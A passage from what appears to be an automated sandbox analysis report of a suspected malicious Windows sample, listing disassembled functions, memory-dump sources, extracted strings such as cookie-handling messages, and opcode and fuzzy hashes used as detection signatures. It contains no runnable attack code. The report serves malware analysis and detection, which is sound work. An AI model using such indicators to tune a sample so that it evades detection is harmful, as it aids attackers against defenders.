                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      • Opcode ID: fa55ad865be5c581a62a0fcb77b23112e8a903fc29206a5d677751fc04c21877
                                                      • Instruction ID: 491f070d1d51c9339c110b9d4b37fbcc42ffd8772577c579396bb016f491364a
                                                      • Opcode Fuzzy Hash: fa55ad865be5c581a62a0fcb77b23112e8a903fc29206a5d677751fc04c21877
                                                      • Instruction Fuzzy Hash: 603190B49097089FCB10EFB8D59569EBBF0BF84344F00896AE898A7351E7749A44CF52
                                                      Function 07130B9A Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397915261.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7130000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `
                                                      • API String ID: 0-934871106
                                                      • Opcode ID: 00be7b6da5783b8aa433670e53446fa5c5ad503927098a1bd83ed068c851e27e
                                                      • Instruction ID: 288664352921bc3a212875ce19bba18b350ff276cba5cfba904c494db038abe5
                                                      • Opcode Fuzzy Hash: 00be7b6da5783b8aa433670e53446fa5c5ad503927098a1bd83ed068c851e27e
                                                      • Instruction Fuzzy Hash: 381129F517C206EE971ACB54D9105FD7BFBEA8F230F3244E6E80A96249D3A04E094125
                                                      Function 0085B160 Relevance: 1.3, APIs: 1, Instructions: 9sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 6c6455a390f56c6969cd356441ff708d0e3ba66e84c3f54c0e32d6071d0aa12c
                                                      • Instruction ID: b30f5a9967ff43f579c4fe3e361d0b4df4370a3ae52550ecf4517a2863b29b47
                                                      • Opcode Fuzzy Hash: 6c6455a390f56c6969cd356441ff708d0e3ba66e84c3f54c0e32d6071d0aa12c
                                                      • Instruction Fuzzy Hash: CBC04CE0C1464447D710BA38854651E79E47785504FC11E68D984961D5F72893588667
                                                      Function 071D0DC2 Relevance: .1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398100630.00000000071D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_71d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 69cd6bb0af58056383edc0e7b5f1ee0b09842649060c76d6a49935a566759150
                                                      • Instruction ID: d7659fd9cdf1a0ff2543f4db4d048095b29818aa721994fb5367cc4e461fe75c
                                                      • Opcode Fuzzy Hash: 69cd6bb0af58056383edc0e7b5f1ee0b09842649060c76d6a49935a566759150
                                                      • Instruction Fuzzy Hash: 43118CE712C20DEE9649562559514FB2F1AE79F330F32415EF043AA6C2D3250E290D32
                                                      Function 07130BCF Relevance: .1, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397915261.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7130000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 19f94c7e6f65961fccfe1bba53dc7d5d61ac6c72452dfd9263eeb8b9f8b8f9d4
                                                      • Instruction ID: 33cc39007cc7d42ef80cd0038b3a6f339d61cd9fda0070f4171a8ed13d46ed3e
                                                      • Opcode Fuzzy Hash: 19f94c7e6f65961fccfe1bba53dc7d5d61ac6c72452dfd9263eeb8b9f8b8f9d4
                                                      • Instruction Fuzzy Hash: 1E01F5FA13C104EDA609C645A700AFE77EFE6DF330F3280A6F80A92644D3A14E495135
                                                      Function 071D0DF1 Relevance: .1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398100630.00000000071D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_71d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 847a04f901c2c67b6701ced344674c62d72b48ad35a31f63f37d568173344744
                                                      • Instruction ID: 2b270863058d205afed49b36c703dbe5d9cacbff191c4f664deeaf37c42f54e6
                                                      • Opcode Fuzzy Hash: 847a04f901c2c67b6701ced344674c62d72b48ad35a31f63f37d568173344744
                                                      • Instruction Fuzzy Hash: C9014CD702C20EEE9A0D5A2555515FA2B1AE79F734F33810AF043AA6C1D3264F1A0922
                                                      Function 07130BEE Relevance: .1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397915261.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7130000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 034d19effefbb63256374d55dce0a15415a8e16f6eaf74b6fe078ad9c5b7cce1
                                                      • Instruction ID: 2ce98115cd0589e43224aaabfc9a95f73b94757a779e9c05dbb2b450c7699dcf
                                                      • Opcode Fuzzy Hash: 034d19effefbb63256374d55dce0a15415a8e16f6eaf74b6fe078ad9c5b7cce1
                                                      • Instruction Fuzzy Hash: C701D4F613C205EDA609C644AB006FE77EEE78F330F3284A6E80A96684E3A15A495535
                                                      Function 07130BDC Relevance: .1, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397915261.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7130000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a9022aa836d1c1385a7b32bd6dd393542af38fadfc0c94ae71a6b90bd18a1b4
                                                      • Instruction ID: 70171d33c518d169c81182eee09c6c4707cfc72fc7afaa8d8554e3da0deed585
                                                      • Opcode Fuzzy Hash: 9a9022aa836d1c1385a7b32bd6dd393542af38fadfc0c94ae71a6b90bd18a1b4
                                                      • Instruction Fuzzy Hash: 3E0124FA13C104EDA609C644E700AFD77EFE6CF330F3284A6E80A96644E3A14E494135
                                                      Function 071D0E4F Relevance: .1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398100630.00000000071D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_71d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fc5175e8699dfe9dc153db61f32f81081e4c61d1c78f8f7c82e453f03e8e42d8
                                                      • Instruction ID: d203ee22a4e0fd39f53376d8387ea67a5c8c3edbef838570055298fd17cbe6ca
                                                      • Opcode Fuzzy Hash: fc5175e8699dfe9dc153db61f32f81081e4c61d1c78f8f7c82e453f03e8e42d8
                                                      • Instruction Fuzzy Hash: ACF0F4EB17C00EED690D556666504FB1B0AF29F730F32850AF007B66C193254E150C36
                                                      Function 071D0E30 Relevance: .1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398100630.00000000071D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_71d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67147f66d6f31a6c8de2c7d9d580e34c890e44f68d759999bba9cdd407573005
                                                      • Instruction ID: 178b9f3df08cc358732ca7c234c95c456240c4ca9d79b268f6f616615a3a76c1
                                                      • Opcode Fuzzy Hash: 67147f66d6f31a6c8de2c7d9d580e34c890e44f68d759999bba9cdd407573005
                                                      • Instruction Fuzzy Hash: FFF028E713D20E9E9608692569505FB2B59E39F730F324615F043B75C493610E460D25
                                                      Function 07130C04 Relevance: .1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397915261.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7130000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f46f4870c70886498cb01c23405dae962b64a1a33661e9514c122d240e91ed81
                                                      • Instruction ID: 929ded66bb1ba81a849fad1e92d63c13c9e7c239d6cdf8b0d8837ec464d88b0b
                                                      • Opcode Fuzzy Hash: f46f4870c70886498cb01c23405dae962b64a1a33661e9514c122d240e91ed81
                                                      • Instruction Fuzzy Hash: 74F0D6F5138105ED9609CA5496006FD77FFE78F330F3280A6E80A92644E3B15E455535
                                                      Function 071D0E60 Relevance: .1, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398100630.00000000071D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_71d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9b75da5f6aba0c667ffb6882be908dcfa07b34d1a257a0f68a90213f7b66e07
                                                      • Instruction ID: 0d932b4fd02af7444a5ee0ac43865cc4c622addc1b8cc0d24946aaf4fab2e1bb
                                                      • Opcode Fuzzy Hash: f9b75da5f6aba0c667ffb6882be908dcfa07b34d1a257a0f68a90213f7b66e07
                                                      • Instruction Fuzzy Hash: 2C0149E712D2899FD70A5B3514911F53F65EB5F234F36058AE082AF6C3C7294E0A4B32
                                                      Function 07130C1A Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397915261.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7130000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: caca29bc3fe5a87e3b0b863b20f67fac84be7eb894b5ca8622f476d643a8b871
                                                      • Instruction ID: a5d6a1710dcc4ef9bc5e36774ced972ce50dd910f2dea1bf8679732931840d63
                                                      • Opcode Fuzzy Hash: caca29bc3fe5a87e3b0b863b20f67fac84be7eb894b5ca8622f476d643a8b871
                                                      • Instruction Fuzzy Hash: 74F07DF603C104EDC70AC76892542FCBBF6EA8F330F3644D6E80E55645D3A54A0A5135
                                                      Function 071D0E3D Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398100630.00000000071D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_71d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4345d412fb5e54cd4d92f37340c163cda7915745b586ff540589df9b031c1dc0
                                                      • Instruction ID: d8022f416a6c74c5dd2f6652cfd2169710de63c244040e59402ca8d777dac6af
                                                      • Opcode Fuzzy Hash: 4345d412fb5e54cd4d92f37340c163cda7915745b586ff540589df9b031c1dc0
                                                      • Instruction Fuzzy Hash: 51F08BE703D20EDE960C9925A5900FA2B55E39F330F324509F043B66C5D3210F454D31
                                                      Function 071D0E23 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398100630.00000000071D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_71d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6d9989c751190e3e135b3688f02c02b62a9d6fe29e59ab5ccda18fe7b232f087
                                                      • Instruction ID: 197a34992616fd1a8d7762175e037715314f164d1a7ca15069233021ce9b2544
                                                      • Opcode Fuzzy Hash: 6d9989c751190e3e135b3688f02c02b62a9d6fe29e59ab5ccda18fe7b232f087
                                                      • Instruction Fuzzy Hash: 90F0E9E717D10EDE550C652666615FB1705E29F730F33851AF007B66C597254F090D36
                                                      Function 07130C4B Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397915261.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7130000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fd3d416e2aac6c6da2a3844bf41f02e77f7a4b07844838abb321b4bbfcb0620f
                                                      • Instruction ID: 2636a79c0276a850aef457ea24745990c53bc1446e79b544571032318c52e3dd
                                                      • Opcode Fuzzy Hash: fd3d416e2aac6c6da2a3844bf41f02e77f7a4b07844838abb321b4bbfcb0620f
                                                      • Instruction Fuzzy Hash: ADF081F5078104DDD619C76496502FC77FAE79F230F3244E7E40AA2A84E3608F095525
                                                      Function 07130C2D Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397915261.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7130000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bcb7a745c366c887e74a7022d0fd7582e213c9e96e4c5dd2559086fd04dfba94
                                                      • Instruction ID: 60f75687384e7b8e9272a9c1c09f53b1012b30f67027d04a512e317639507068
                                                      • Opcode Fuzzy Hash: bcb7a745c366c887e74a7022d0fd7582e213c9e96e4c5dd2559086fd04dfba94
                                                      • Instruction Fuzzy Hash: 55F021F5138104DDD709C75492445FC77FAA68F330F3644B6E40A62645D3A05E095525
                                                      Function 071D0E8B Relevance: .0, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398100630.00000000071D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_71d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a68f2898efcedc38c4a9c7e9581e1cb4eb5adc06c8b7729dd13668ba1b6ec17
                                                      • Instruction ID: b6aa83986ae569e973215527a363950206728b9292ef72ec256c922fe60880de
                                                      • Opcode Fuzzy Hash: 3a68f2898efcedc38c4a9c7e9581e1cb4eb5adc06c8b7729dd13668ba1b6ec17
                                                      • Instruction Fuzzy Hash: 59F055E746C30ADF92589A6201800FB3399F76F330F328419F003A76C0A7241E050D36

                                                      Non-executed Functions

                                                      Function 00511BE0 Relevance: 33.9, Strings: 26, Instructions: 1418COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                      • API String ID: 0-1371176463
                                                      • Opcode ID: c3257d62638e98a859222f9cf0c3ae2327789006eb1dafafad666c193c6e9429
                                                      • Instruction ID: 397c137762919aff3e2f3030f215b9f2139ee75fd15c95c016d8e3a99aab5fb8
                                                      • Opcode Fuzzy Hash: c3257d62638e98a859222f9cf0c3ae2327789006eb1dafafad666c193c6e9429
                                                      • Instruction Fuzzy Hash: BFB25870A087006BFB219A25DC52BA77FD5BF80308F08492DF98997292F775ECA1C756
                                                      Function 0085E030 Relevance: 26.6, APIs: 11, Strings: 3, Instructions: 2082COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: localeconv
                                                      • String ID: $d$nil)
                                                      • API String ID: 3737801528-394766432
                                                      • Opcode ID: 9e3fc2e0fc3514ad4d85e53d3e792dd00355294056855aa089d86ed79e5e9a0c
                                                      • Instruction ID: 6b6ad9a6362d0bb08a23fbd121c5ed3fd99dbdcb80decfeb2b5dc03223acbfd4
                                                      • Opcode Fuzzy Hash: 9e3fc2e0fc3514ad4d85e53d3e792dd00355294056855aa089d86ed79e5e9a0c
                                                      • Instruction Fuzzy Hash: A31368706087018FD724CF28C48062ABBE1FF89359F25496DEA95DB3A1D771ED49CB82
                                                      Function 004E4940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                      • API String ID: 0-122532811
                                                      • Opcode ID: 5022fb13e5b5331f246e53d3f35956c5e7fd27d94c6f9105265e055a4812168e
                                                      • Instruction ID: 4f8142691f609f535c9a2542d536e08c9aaa2bd6ec1bfda726c79f9dd34cc69e
                                                      • Opcode Fuzzy Hash: 5022fb13e5b5331f246e53d3f35956c5e7fd27d94c6f9105265e055a4812168e
                                                      • Instruction Fuzzy Hash: 9342F571B08700AFD718DE29CC91B6BB7E6EBC4704F048A2DF59997391D779A8048B92
                                                      Function 004E3ED0 Relevance: 15.7, Strings: 12, Instructions: 689COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
